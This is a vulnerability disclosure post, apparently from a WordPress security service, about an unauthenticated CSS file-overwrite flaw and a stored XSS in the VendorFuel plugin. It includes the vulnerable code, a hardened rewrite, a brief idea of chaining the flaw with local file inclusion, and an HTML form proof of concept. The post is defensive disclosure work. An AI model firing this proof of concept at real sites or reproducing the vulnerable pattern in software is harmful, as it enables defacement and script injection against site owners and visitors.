Our Proactive Monitoring Caught a Restricted File Upload Vulnerability in VendorFuel
One of the ways we help to improve the security of WordPress plugins, not just for our customers but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory, to try to catch serious vulnerabilities before they are exploited. While we have a number of automated checks that are used to try to spot the possibility of those, most of the vulnerabilities found so far have come from only two of them. Recently, though, another one of those checks caught a vulnerability in the plugin VendorFuel that allows anyone to rewrite the contents of a .css file that is part of the plugin.
The code that causes that is at the beginning of the file /admin-pages/styling.php:
```php
if (isset($_POST['customcss'])) {
	$file_open = fopen(dirname(__DIR__) . '/local/css/style.css', "w+");
	fwrite($file_open, stripslashes($_POST['customcss']));
	fclose($file_open);
}
```
With that code, if the POST input “customcss” exists, then its value will be written to the file /wp-content/plugins/vendorfuel/local/style.css. Since the file can be requested directly and the code performs no capability check or nonce verification before writing, anyone who can reach the site can do this.
So what could be done with this vulnerability beyond just changing the CSS? One thing that could be done is to combine it with a local file inclusion (LFI) vulnerability, to run malicious PHP code added to the file. There have also been security issues connected to CSS itself, like one that was recently disclosed that could crash iPhones (though that one wouldn’t be something that could be exploited with this vulnerability).
Further into the file the contents of style.css are output without being escaped, which would permit persistent cross-site scripting (XSS) to occur if someone visits that styling.php page after malicious JavaScript has been saved to the style.css file.
```php
$datalines = file(dirname(__DIR__) . '/local/css/style.css');
foreach ($datalines as $zz) {
	echo $zz;
}
```
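For comparison, here is how the same write-and-display handler looks once the missing checks are in place. This is an added example, not VendorFuel’s own code or its later fix; it assumes the file is loaded by WordPress as an admin page (so the WordPress functions below exist) rather than requested directly, and the nonce action name is made up for the example.

```php
<?php
// Added example (not the plugin's code): a hardened version of the
// styling.php handler. Assumes WordPress has loaded this file.

// A direct request to this file bypasses WordPress entirely, so refuse it.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

$css_path = dirname( __DIR__ ) . '/local/css/style.css';

if ( isset( $_POST['customcss'] ) ) {
	// Only users allowed to manage site options may change the styling.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
	}
	// Verify the nonce (action name is hypothetical) to block CSRF.
	check_admin_referer( 'vendorfuel_save_customcss' );

	// wp_unslash() undoes the slashes WordPress adds to $_POST, then
	// wp_strip_all_tags() removes HTML and PHP tags so the stored text
	// cannot carry <script> or <?php ... ?> markup.
	$css = wp_strip_all_tags( wp_unslash( $_POST['customcss'] ) );

	// Write with an exclusive lock and report failure instead of ignoring it.
	if ( false === file_put_contents( $css_path, $css, LOCK_EX ) ) {
		wp_die( 'Could not write the stylesheet.' );
	}
}

// Render the form. The nonce field matches check_admin_referer() above.
$current_css = file_exists( $css_path ) ? file_get_contents( $css_path ) : '';
?>
<form method="post">
	<?php wp_nonce_field( 'vendorfuel_save_customcss' ); ?>
	<!-- esc_textarea() escapes the stored text so it renders as text, not markup. -->
	<textarea name="customcss" rows="20" cols="80"><?php echo esc_textarea( $current_css ); ?></textarea>
	<p><input type="submit" class="button button-primary" value="Save CSS" /></p>
</form>
```

The capability check and nonce close the unauthenticated write, and escaping the stored text on output closes the persistent XSS; stripping tags before the write additionally limits what a separate LFI could execute from the file.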
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. Hopefully they will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).
If you use our service, you likely would have already been warned if you were impacted by this vulnerability by the time you read this.
Proof of Concept
The following proof of concept will cause the contents of the file /wp-content/plugins/vendorfuel/local/style.css to be set to “This shouldn’t be here.”.
Make sure to replace “[path to WordPress]” with the location of WordPress.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/vendorfuel/admin-pages/styling.php" method="POST">
<input type="hidden" name="customcss" value="This shouldn't be here." />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```
This feature and code are no longer available after 2.0.0. All local file changes are sanitized and handled via WP REST API routes. The style sheet is then enqueued via wp_enqueue_style().